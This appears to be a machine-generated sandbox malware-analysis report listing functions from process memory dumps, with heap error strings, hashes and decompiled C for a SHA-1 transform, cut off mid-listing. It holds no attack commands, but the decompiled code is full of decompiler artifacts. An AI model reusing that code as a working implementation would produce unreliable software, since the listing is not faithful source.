Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
API String ID: 0-2419525547
Opcode ID: 237786242b7d485b4c550a19d32c455e2778245fb336c162ee99bbf3ab31ed9f
Instruction ID: 0c4c9a765fd524719043e54cb85b35cb1bee43623c161bb1d24f506d56c7553a
Opcode Fuzzy Hash: 237786242b7d485b4c550a19d32c455e2778245fb336c162ee99bbf3ab31ed9f
Instruction Fuzzy Hash: B6C2AA75A042169FCB18CF19C494A7A7BB2FF84314B29C5ADEC5A8B355E730EC41CB98

Uniqueness

Uniqueness Score: -1.00%

Function 025A3040, Relevance: 4.8, Strings: 3, Instructions: 1098COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 025FACC2
HEAP: Free Heap block %lx modified at %lx after it was freed, xrefs: 025FACD9
HEAP[%wZ]: , xrefs: 025FACB5

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
API String ID: 0-2419525547
Opcode ID: 44bebca7f3c201c1c154a05a5c2fc773b6ae401a0b957f6d0413613a7357f768
Instruction ID: 3c29c10ed168658bdc2d792bc9af5745cf7f528b96ef8530aead76cca86eac2d
Opcode Fuzzy Hash: 44bebca7f3c201c1c154a05a5c2fc773b6ae401a0b957f6d0413613a7357f768
Instruction Fuzzy Hash: 69A2A070904255DFDB29CF68C491BADBBB2FF48308F14859EE88A9B255D734E881CF58

Uniqueness

Uniqueness Score: -1.00%

Function 025AC85C, Relevance: 4.6, Strings: 3, Instructions: 858COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 025FDC1C
HEAP[%wZ]: , xrefs: 025FDC0F
Unable to release memory at %p for %p bytes - Status == %x, xrefs: 025FDC30

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %p bytes - Status == %x
API String ID: 0-212623055
Opcode ID: dc3c61c74fef3adf057a39815cbddff38bbc6b77ce18983ab255464b2770871a
Instruction ID: 92a93247f5c8287c653e8048d4d571ccea016fb234282ac94a2b4fa90bc0e369
Opcode Fuzzy Hash: dc3c61c74fef3adf057a39815cbddff38bbc6b77ce18983ab255464b2770871a
Instruction Fuzzy Hash: D6720E71901259DFDB25CFA8C891BBDBBF1FF08314F04845AE996AB291D334A841CF68

Uniqueness

Uniqueness Score: -1.00%

Function 025A29B2, Relevance: 4.6, Strings: 3, Instructions: 851COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 025F9F72, 025FA025, 025FA24D, 025FA2FF
HEAP: Free Heap block %lx modified at %lx after it was freed, xrefs: 025F9F86, 025FA039, 025FA261, 025FA313
HEAP[%wZ]: , xrefs: 025F9F65, 025FA018, 025FA240, 025FA2F2

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
API String ID: 0-2419525547
Opcode ID: d0f318bce9a725b4e19463b8ee7e5b2c3378200fd5bdc1ec2cfd41772f22c6cd
Instruction ID: 5c32478c6dceff01693e8d4ff5a8250391c3868c65b689b6c5de691adaff92cd
Opcode Fuzzy Hash: d0f318bce9a725b4e19463b8ee7e5b2c3378200fd5bdc1ec2cfd41772f22c6cd
Instruction Fuzzy Hash: F372BD70A00606DFDB68CF14C491FBABBB2FF89318F15849DE94A8B651D730E941CB99

Uniqueness

Uniqueness Score: -1.00%

Function 025C63DB, Relevance: 4.1, Strings: 3, Instructions: 340COMMON

Download Yara Rule

Strings

RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %x), xrefs: 025F9636
HEAP: , xrefs: 025F9623
HEAP[%wZ]: , xrefs: 025F9616

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %x)
API String ID: 0-385592399
Opcode ID: c8f9ae66c6ce741fce91d309c98f14a3649431b8d9e0dc8da4419c4c74ccb9a0
Instruction ID: f388a3e79286bf43e4aded8a20414ed1fd5dd72775df92c93f5137ebb98bc3bb
Opcode Fuzzy Hash: c8f9ae66c6ce741fce91d309c98f14a3649431b8d9e0dc8da4419c4c74ccb9a0
Instruction Fuzzy Hash: 7CD1D171A00556DFDB14CFA9C480BBABBF9BF84304F24819DE6519B245E730EE41CB98

Uniqueness

Uniqueness Score: -1.00%

Function 025B1489, Relevance: 4.0, Strings: 3, Instructions: 271COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 02602D14
HEAP[%wZ]: , xrefs: 02602D07
RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 02602D1F

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
API String ID: 0-1596344177
Opcode ID: 8adb3c76f06a53ad5d7a59e13d156e646040cacc813195b3b43f1e93fc736c68
Instruction ID: 4661e59798f7dceb4019ed5703b0e23cc5e0cf3ca6f4f42f479632568faabc7b
Opcode Fuzzy Hash: 8adb3c76f06a53ad5d7a59e13d156e646040cacc813195b3b43f1e93fc736c68
Instruction Fuzzy Hash: 4EB19E31600606DFCB69CF28C4D4AB9BBF1FF49314B1586A9E85A8B691D730E880CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0262579A, Relevance: 3.9, Strings: 3, Instructions: 142COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 026258E4
HEAP[%wZ]: , xrefs: 026258D7
Heap block at %p modified at %p past requested size of %lx, xrefs: 026258F7

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %lx
API String ID: 0-3722492067
Opcode ID: d89f6af56f021e24bf3878066357d7d3198dad0e961cb8490128a1149ac86d01
Instruction ID: 1b367922cdc78eea4a6668800dcc24f9edc0e870855fbd655bfd82936652284f
Opcode Fuzzy Hash: d89f6af56f021e24bf3878066357d7d3198dad0e961cb8490128a1149ac86d01
Instruction Fuzzy Hash: 52410E35620A70DFD77C8E19C844AB277E5EF44764BC48889E8D7CB281D369E84ADF60

Uniqueness

Uniqueness Score: -1.00%

Function 02653A83, Relevance: 2.8, Strings: 2, Instructions: 307COMMON

Download Yara Rule

Strings

*.*, xrefs: 02653CED
MUI, xrefs: 02653E42

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: *.*$MUI
API String ID: 0-3752369296
Opcode ID: 8205da5e35873b2fd7f9c2297f96fc8d4b5b9856c92819bdce18dc56e149cd0a
Instruction ID: cec14e1583a007899e00c150dba0e821f63ff864324a41446e02632ce26a7372
Opcode Fuzzy Hash: 8205da5e35873b2fd7f9c2297f96fc8d4b5b9856c92819bdce18dc56e149cd0a
Instruction Fuzzy Hash: 53C172359056289ACF71DF28CC49B9AB7B4EF48740F0482DAE849E7390EB709AD4CF51

Uniqueness

Uniqueness Score: -1.00%

Function 025DD47D, Relevance: 2.4, Strings: 1, Instructions: 1138COMMON

Download Yara Rule

Strings

, xrefs: 025E8372

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-3916222277
Opcode ID: 3a30dde500e148541b1901a97a2ae806d91668aca4308796bdee4a01a326b4e0
Instruction ID: 8990e8c839eabc36310a814d37e3b8e57f0a26cefe462e2544fb7b2d363344ed
Opcode Fuzzy Hash: 3a30dde500e148541b1901a97a2ae806d91668aca4308796bdee4a01a326b4e0
Instruction Fuzzy Hash: A7A268729012699FEF758F18CC85BE9BBB5BB09304F0484EAE649A3210D7719EC4CF59

Uniqueness

Uniqueness Score: -1.00%

Function 025B69FE, Relevance: 1.7, Strings: 1, Instructions: 437COMMON

Download Yara Rule

Strings

8@8, xrefs: 025B6A00

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: 8@8
API String ID: 0-222468769
Opcode ID: 52a7b4fd9904778a68f426b789c55f952f178534bf943c7b801e7968525b1fea
Instruction ID: 2736c0cd9dfe6643921b0ce5db199fff3b1f66a2bc1d86850acd422c5b744aa8
Opcode Fuzzy Hash: 52a7b4fd9904778a68f426b789c55f952f178534bf943c7b801e7968525b1fea
Instruction Fuzzy Hash: ACF16371A00209AFDF16CFA4C840BFEBBB9FF44704F14846AE905AB290D375D981CB58

Uniqueness

Uniqueness Score: -1.00%

Function 72488C7B, Relevance: 1.7, Strings: 1, Instructions: 423
COMMONCrypto

Download Yara Rule

C-Code - Quality: 73%

			E72488C7B(void* __ecx, void* __edx, signed int* _a4) {
				char _v5;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v304;
				signed char* _t278;
				signed int* _t279;
				signed int _t280;
				signed int _t286;
				signed int _t289;
				signed int _t293;
				signed int _t296;
				signed int _t300;
				signed int _t304;
				signed int _t306;
				signed int _t312;
				signed int _t320;
				signed int _t322;
				signed int _t325;
				signed int _t327;
				signed int _t336;
				signed int _t342;
				signed int _t343;
				signed int _t348;
				signed int _t358;
				signed int _t362;
				signed int _t363;
				signed int _t367;
				signed int _t370;
				signed int _t374;
				signed int _t375;
				signed int _t405;
				signed int _t410;
				signed int _t416;
				signed int _t419;
				signed int _t426;
				signed int _t429;
				signed int _t438;
				signed int _t440;
				signed int _t443;
				signed int _t451;
				signed int _t466;
				signed int _t469;
				signed int _t470;
				signed int _t471;
				signed int _t477;
				signed int _t485;
				signed int _t486;
				signed int* _t487;
				signed int* _t490;
				signed int _t497;
				signed int _t500;
				signed int _t505;
				signed int _t508;
				signed int _t511;
				signed int _t514;
				signed int _t515;
				signed int _t519;
				signed int _t531;
				signed int _t534;
				signed int _t541;
				char* _t547;
				char* _t549;
				char* _t560;

				_t547 = _t549;
				_t490 = _a4;
				_t358 = 0;
				_t3 =  &(_t490[7]); // 0x1b
				_t278 = _t3;
				do {
					 *(_t547 + _t358 * 4 - 0x14c) = ((( *(_t278 - 1) & 0x000000ff) << 0x00000008 |  *_t278 & 0x000000ff) << 0x00000008 | _t278[1] & 0x000000ff) << 0x00000008 | _t278[2] & 0x000000ff;
					 *(_t547 + _t358 * 4 - 0x148) = (((_t278[3] & 0x000000ff) << 0x00000008 | _t278[4] & 0x000000ff) << 0x00000008 | _t278[5] & 0x000000ff) << 0x00000008 | _t278[6] & 0x000000ff;
					 *(_t547 + _t358 * 4 - 0x144) = (((_t278[7] & 0x000000ff) << 0x00000008 | _t278[8] & 0x000000ff) << 0x00000008 | _t278[9] & 0x000000ff) << 0x00000008 | _t278[0xa] & 0x000000ff;
					 *(_t547 + _t358 * 4 - 0x140) = (((_t278[0xb] & 0x000000ff) << 0x00000008 | _t278[0xc] & 0x000000ff) << 0x00000008 | _t278[0xd] & 0x000000ff) << 0x00000008 | _t278[0xe] & 0x000000ff;
					_t358 = _t358 + 4;
					_t278 =  &(_t278[0x10]);
				} while (_t358 < 0x10);
				_t279 =  &_v304;
				_v8 = 0x10;
				do {
					_t405 =  *(_t279 - 0x18);
					_t466 =  *(_t279 - 0x14);
					_t362 =  *(_t279 - 0x20) ^ _t279[5] ^  *_t279 ^ _t405;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t279[9] =  *(_t279 - 0x1c) ^ _t279[6] ^ _t279[1] ^ _t466;
					_t279[8] = _t362;
					_t320 = _t279[7] ^  *(_t279 - 0x10) ^ _t279[2];
					_t279 =  &(_t279[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t47 =  &_v8;
					 *_t47 = _v8 - 1;
					_t279[6] = _t320 ^ _t405;
					_t279[7] =  *(_t279 - 0x1c) ^  *(_t279 - 4) ^ _t362 ^ _t466;
				} while ( *_t47 != 0);
				_t322 =  *_t490;
				_t280 = _t490[1];
				_t363 = _t490[2];
				_t410 = _t490[3];
				_v12 = _t322;
				_v16 = _t490[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t469 = _v8;
					_t497 = _t322 + ( !_t280 & _t410 | _t363 & _t280) +  *((intOrPtr*)(_t547 + _t469 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t325 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t410;
					_v12 = _t497;
					asm("rol esi, 0x5");
					_v8 = _t363;
					_t416 = _t497 + ( !_t325 & _t363 | _t280 & _t325) +  *((intOrPtr*)(_t547 + _t469 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t500 = _t280;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t367 = _v12;
					_v8 = _t325;
					_t327 = _v8;
					_v12 = _t416;
					asm("rol edx, 0x5");
					_t286 = _t416 + ( !_t367 & _t500 | _t325 & _t367) +  *((intOrPtr*)(_t547 + _t469 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t419 = _v12;
					_v16 = _t500;
					asm("ror ecx, 0x2");
					_v8 = _t367;
					_v12 = _t286;
					asm("rol eax, 0x5");
					_v16 = _t327;
					_t505 = _t286 + ( !_t419 & _t327 | _t367 & _t419) +  *((intOrPtr*)(_t547 + _t469 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t363 = _v12;
					_t289 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t419;
					_v12 = _t505;
					asm("rol esi, 0x5");
					_v16 = _t289;
					_t280 = _v12;
					_t508 = _t505 + ( !_t363 & _t289 | _t419 & _t363) +  *((intOrPtr*)(_t547 + _t469 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t410 = _v8;
					asm("ror ecx, 0x2");
					_t470 = _t469 + 5;
					_t322 = _t508;
					_v12 = _t322;
					_v8 = _t470;
				} while (_t470 < 0x14);
				_t471 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t410;
					_t511 = _t508 + (_t410 ^ _t363 ^ _t280) +  *((intOrPtr*)(_t547 + _t471 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t336 = _v12;
					_v12 = _t511;
					asm("rol esi, 0x5");
					_t426 = _t511 + (_t363 ^ _t280 ^ _t336) +  *((intOrPtr*)(_t547 + _t471 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t514 = _t280;
					_v16 = _t363;
					_t370 = _v12;
					_v12 = _t426;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t293 = _t426 + (_t280 ^ _t336 ^ _t370) +  *((intOrPtr*)(_t547 + _t471 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t429 = _v12;
					_v8 = _t336;
					_v8 = _t370;
					_v12 = _t293;
					asm("rol eax, 0x5");
					_t471 = _t471 + 5;
					_t363 = _v12;
					asm("ror edx, 0x2");
					_t147 = _t514 + 0x6ed9eba1; // 0x6ed9eb9f
					_t515 = _t293 + (_t336 ^ _v8 ^ _t429) +  *((intOrPtr*)(_t547 + _t471 * 4 - 0x154)) + _t147;
					_t296 = _v8;
					_v8 = _t429;
					_v12 = _t515;
					asm("rol esi, 0x5");
					_t410 = _v8;
					_t508 = _t515 + (_t296 ^ _v8 ^ _t363) +  *((intOrPtr*)(_t547 + _t471 * 4 - 0x150)) + _t336 + 0x6ed9eba1;
					_v16 = _t296;
					_t280 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t508;
				} while (_t471 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t410;
					asm("ror eax, 0x2");
					_t519 = ((_t363 | _t280) & _t410 | _t363 & _t280) +  *((intOrPtr*)(_t547 + _v8 * 4 - 0x14c)) + _t508 + _v16 - 0x70e44324;
					_t477 = _v12;
					_v12 = _t519;
					asm("rol esi, 0x5");
					_t342 = _v8;
					asm("ror edi, 0x2");
					_t438 = ((_t280 | _t477) & _t363 | _t280 & _t477) +  *((intOrPtr*)(_t547 + _t342 * 4 - 0x148)) + _t519 + _v16 - 0x70e44324;
					_v16 = _t363;
					_t374 = _v12;
					_v12 = _t438;
					asm("rol edx, 0x5");
					_v8 = _t280;
					_t440 = ((_t477 | _t374) & _t280 | _t477 & _t374) +  *((intOrPtr*)(_t547 + _t342 * 4 - 0x144)) + _t438 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t300 = _v12;
					_v8 = _t477;
					_v12 = _t440;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t531 = ((_t374 | _t300) & _t477 | _t374 & _t300) +  *((intOrPtr*)(_t547 + _t342 * 4 - 0x140)) + _t440 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t443 = _t374;
					_t363 = _v12;
					_v8 = _t443;
					_v12 = _t531;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t508 = ((_t300 | _t363) & _t443 | _t300 & _t363) +  *((intOrPtr*)(_t547 + _t342 * 4 - 0x13c)) + _t531 + _v16 - 0x70e44324;
					_t410 = _t300;
					_t280 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t508;
					_t343 = _t342 + 5;
					_v8 = _t343;
				} while (_t343 < 0x3c);
				_t485 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t486 = _v8;
					asm("ror eax, 0x2");
					_t534 = (_t410 ^ _t363 ^ _t280) +  *((intOrPtr*)(_t547 + _t485 * 4 - 0x14c)) + _t508 + _v16 - 0x359d3e2a;
					_t348 = _v12;
					_v16 = _t410;
					_v12 = _t534;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
					_t451 = (_t363 ^ _t280 ^ _t348) +  *((intOrPtr*)(_t547 + _t486 * 4 - 0x148)) + _t534 + _v16 - 0x359d3e2a;
					_v16 = _t363;
					_t375 = _v12;
					_v12 = _t451;
					asm("rol edx, 0x5");
					_v16 = _t280;
					asm("ror ecx, 0x2");
					_t304 = (_t280 ^ _t348 ^ _t375) +  *((intOrPtr*)(_t547 + _t486 * 4 - 0x144)) + _t451 + _v16 - 0x359d3e2a;
					_t410 = _v12;
					_v12 = _t304;
					asm("rol eax, 0x5");
					_v16 = _t348;
					_t541 = (_t348 ^ _t375 ^ _t410) +  *((intOrPtr*)(_t547 + _t486 * 4 - 0x140)) + _t304 + _v16 - 0x359d3e2a;
					_t306 = _t375;
					_v8 = _t348;
					asm("ror edx, 0x2");
					_v8 = _t375;
					do {
						_t547 =  &_v5;
						_t560 = _t547;
						asm("cld");
						_t363 = _v12;
						_v12 = _t541;
					} while (_t560 != 0);
					asm("rol esi, 0x5");
					_t485 = _t486 + 5;
					_t508 = (_t306 ^ _t410 ^ _t363) +  *((intOrPtr*)(_t547 + _t486 * 4 - 0x13c)) + _t541 + _v16 - 0x359d3e2a;
					_v16 = _t306;
					_t280 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t410;
					_v12 = _t508;
					_v8 = _t485;
				} while (_t485 < 0x50);
				_t487 = _a4;
				_t487[2] = _t487[2] + _t363;
				_t487[3] = _t487[3] + _t410;
				_t312 = _t487[4] + _v16;
				 *_t487 =  *_t487 + _t508;
				_t487[1] = _t487[1] + _t280;
				_t487[4] = _t312;
				_t487[0x17] = 0;
				return _t312;
			}

0x72488c81
0x72488c8b
0x72488c8f
0x72488c91
0x72488c91
0x72488c94
0x72488cb6
0x72488cdc
0x72488d02
0x72488d24
0x72488d2b
0x72488d2e
0x72488d31
0x72488d3a
0x72488d40
0x72488d47
0x72488d58
0x72488d5b
0x72488d5e
0x72488d62
0x72488d64
0x72488d66
0x72488d6f
0x72488d72
0x72488d75
0x72488d80
0x72488d86
0x72488d88
0x72488d88
0x72488d8b
0x72488d8e
0x72488d8e
0x72488d93
0x72488d95
0x72488d98
0x72488d9b
0x72488da1
0x72488da4
0x72488da7
0x72488db0
0x72488db6
0x72488dbf
0x72488dce
0x72488dd5
0x72488dd8
0x72488ddb
0x72488de4
0x72488de7
0x72488dea
0x72488e02
0x72488e09
0x72488e0b
0x72488e0e
0x72488e11
0x72488e1a
0x72488e21
0x72488e24
0x72488e27
0x72488e36
0x72488e3d
0x72488e40
0x72488e43
0x72488e4c
0x72488e56
0x72488e59
0x72488e65
0x72488e68
0x72488e6f
0x72488e72
0x72488e75
0x72488e7a
0x72488e7d
0x72488e86
0x72488e97
0x72488e9a
0x72488e9d
0x72488ea4
0x72488ea7
0x72488eaa
0x72488ead
0x72488eaf
0x72488eb2
0x72488eb5
0x72488ebe
0x72488ec3
0x72488ec3
0x72488ed8
0x72488edb
0x72488ede
0x72488ee5
0x72488ee8
0x72488eeb
0x72488f00
0x72488f07
0x72488f0a
0x72488f0e
0x72488f11
0x72488f16
0x72488f19
0x72488f28
0x72488f2b
0x72488f32
0x72488f35
0x72488f38
0x72488f3b
0x72488f3e
0x72488f46
0x72488f54
0x72488f57
0x72488f5a
0x72488f5a
0x72488f61
0x72488f64
0x72488f67
0x72488f6f
0x72488f7d
0x72488f80
0x72488f87
0x72488f8a
0x72488f8d
0x72488f90
0x72488f93
0x72488f9c
0x72488fa3
0x72488fa3
0x72488fa9
0x72488fc2
0x72488fc5
0x72488fcc
0x72488fcf
0x72488fd2
0x72488fe4
0x72488fee
0x72488ff1
0x72488ffa
0x72488ffd
0x72489004
0x72489007
0x7248900d
0x72489020
0x72489027
0x7248902a
0x7248902d
0x72489030
0x72489039
0x7248903c
0x7248904f
0x72489052
0x7248905c
0x7248905f
0x72489061
0x7248906a
0x7248906d
0x72489080
0x72489086
0x72489089
0x72489090
0x72489092
0x72489095
0x72489098
0x7248909b
0x7248909e
0x724890a1
0x724890aa
0x724890af
0x724890b2
0x724890b2
0x724890c5
0x724890c8
0x724890cb
0x724890d2
0x724890d5
0x724890d8
0x724890db
0x724890ee
0x724890f1
0x724890fc
0x724890ff
0x7248910b
0x7248910e
0x72489114
0x72489117
0x7248911a
0x72489121
0x72489131
0x72489134
0x7248913a
0x7248913d
0x72489144
0x72489146
0x72489149
0x7248914c
0x7248914d
0x7248914d
0x7248914d
0x7248914e
0x7248914f
0x72489152
0x72489153
0x72489159
0x72489168
0x7248916b
0x72489172
0x72489175
0x72489178
0x7248917b
0x7248917e
0x72489181
0x72489184
0x7248918d
0x7248919e
0x724891a6
0x724891ac
0x724891af
0x724891b1
0x724891b4
0x724891b7
0x724891c4

Strings

(, xrefs: 72488F9C

Memory Dump Source

Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true

Yara matches

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 4bab60424770418080d1329d130b2de45f18aadf4c5a92880cb3f83b8d6dd13d
Instruction ID: 0aab09f8af9c8e30ff1c71eff72fa5d9ff68b6224264e7611c10e9aa90d2a9c1
Opcode Fuzzy Hash: 4bab60424770418080d1329d130b2de45f18aadf4c5a92880cb3f83b8d6dd13d
Instruction Fuzzy Hash: D6022CB6E006199FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80

Uniqueness

Uniqueness Score: -1.00%

Function 72488C80, Relevance: 1.7, Strings: 1, Instructions: 423
COMMONCrypto

Download Yara Rule

C-Code - Quality: 73%

			E72488C80(signed int* _a4) {
				char _v5;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v304;
				signed char* _t277;
				signed int* _t278;
				signed int _t279;
				signed int _t285;
				signed int _t288;
				signed int _t292;
				signed int _t295;
				signed int _t299;
				signed int _t303;
				signed int _t305;
				signed int _t311;
				signed int _t318;
				signed int _t320;
				signed int _t323;
				signed int _t325;
				signed int _t334;
				signed int _t340;
				signed int _t341;
				signed int _t346;
				signed int _t353;
				signed int _t357;
				signed int _t358;
				signed int _t362;
				signed int _t365;
